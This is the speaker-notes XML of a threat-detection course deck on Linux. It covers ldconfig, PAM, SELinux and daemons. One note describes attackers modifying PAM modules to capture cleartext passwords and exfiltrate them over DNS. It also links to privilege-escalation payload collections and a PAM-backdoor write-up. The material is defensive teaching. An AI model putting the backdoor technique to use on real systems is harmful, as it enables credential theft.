              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ldconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> checks the header and filenames of the libraries it encounters when determining which versions should have their links updated. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Ldconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> will only look at files that are named lib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>ld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>.so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" panose="05050102010706020507" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> and other files will be ignored.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sources: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.tecmint.com/understanding-shared-libraries-in-linux/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>https://cybersecurity.att.com/blogs/labs-research/hunting-for-linux-library-injection-with-osquery/.</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900993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00" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CWU918KD, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Threat Detection: Linux Environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#payload all the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>things:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GTFOBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://gtfobins.github.io/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>run:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://unix.stackexchange.com/questions/175345/difference-between-run-and-var-run</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Qubes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.qubes-os.org/intro/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1811338" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfr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55938" y="944563"/>
            <a:ext cx="3397250" cy="1911350"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556816" y="955714"/>
            <a:ext cx="5888736" cy="8188804"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="881390">
              <a:spcBef>
                <a:spcPts val="289"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="289"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traditionally,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> systems </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>relied on username and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>password. With improved </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>ways of authenticating </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>being created between </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>updates to /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>file and/or token </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>devices... applications </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>would need to be rewritten </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>to support the authentication. In comes PAM which provides a way to develop programs that are independent of the authentication scheme. The programs would just attach the module at runtime in order to work. Unfortunately, attackers can modify PAM modules with their own capturing of clear text user/name and passwords. These can often be coupled with a silent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> method (i.e., DNS) which means it is important to understand and identify if PAM is being used.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PAM is a suite of shared libraries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>responsible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> for authentication of the files being run. Every application consists of several configurable files and each one consists of a stack of several modules. These modules are then run from top to bottom and then PAM generates the response whether it is to pass or fail on the basis of the result.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PAM can be defined as a generalized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> API for authenticated related services instead of rewriting the code it is modified on its own.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/lib/security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is the dynamically loaded authentication modules called by the actual PAM library.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/security has the configuration files for the modules located in /lib/security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>pam.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is the configuration files for each application that uses PAM. If an application that uses PAM does not have a specific </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file, the default is automatically used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Source: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21283784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Security-Enhanced Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) is a security architecture integrated into the 2.6.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Kernel using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Linux Security </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (LSM). It is a project of the United States National Security Agency (NSA) and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> community. Primarily</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> found on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>RedHat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> Linux systems, but not limited to them.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> provides a flexible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Mandatory Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (MAC) system built into the Linux Kernel. Under standard Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>Discretionary Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (DAC), an application or process running as a user (UID or SUID) has the user’s permissions to objects such as files, sockets and other processes. Running a MAC Kernel protects the system from malicious or flawed applications that can damage or destroy the system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> defines the access and transition rights of every user, application, process and file on the system. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> then governs the interactions of these entities using a security policy that specifies how strict or lenient a given Linux installation should be. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued on next page).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242579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556816" y="893135"/>
            <a:ext cx="5888736" cy="7665577"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Notes continued from previous page).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When a subject, (e.g., an application), attempts to access an object (e.g., a file), the policy enforcement server in the Kernel checks an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>access vector cache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (AVC), where subject and object permissions are cached. If a decision cannot be made based on data in the AVC, the request continues to the security server, which looks up the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>security context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> of the application and the file in a matrix. Permission is then granted or denied, with an AVC: A denied message is detailed in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/log/messages, if permission is denied. The security context of subjects and objects is applied from the installed policy, which also provides the information to populate the security server’s matrix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>selinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> contains a symbolic link to the actual configuration file. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The actual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> configurations of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are captured in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>selinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> file. The /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>selinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory is also the primary location for all policy files.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>To see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>applications </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>or files that have had the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AVC-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>denied message, you can look in the /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/log/messages and/or /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/log/audit/audit.log.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> https://web.mit.edu/rhel-doc/5/RHEL-5-manual/Deployment_Guide-en-US/ch-selinux.html.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1292628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Daemons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> are also known as background processes in a Linux or Unix program that runs in the background. They tend to run for a long time on a system and could fulfill requests like scanning </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>e-mail, return web pages, schedule tasks, etc. Additionally, daemons do not need interaction from a user or terminal. Almost all daemons have names that end with the letter ‘d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is the daemon that handles the Apache server. This is most, but not all (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Shells scripts stored in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> directory are used to start and stop daemons. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>Systemd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> is a replacement for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>initd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>. It was intended to be the standard process for controlling what programs run when a Linux system boots up.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38382941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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>automount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> daemon for remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mounting such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nacron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Checks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>delayed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
